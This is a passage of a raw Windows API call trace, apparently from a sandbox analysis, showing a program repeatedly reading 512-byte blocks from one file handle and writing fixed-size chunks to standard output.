lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.793] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 
[0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] GetFileType (hFile=0x4c) returned 0x1 [0127.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.794] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.794] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0127.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.794] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.796] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType 
(hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.797] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, 
lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, 
lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.798] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, 
lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.799] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.800] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.800] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, 
lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: 
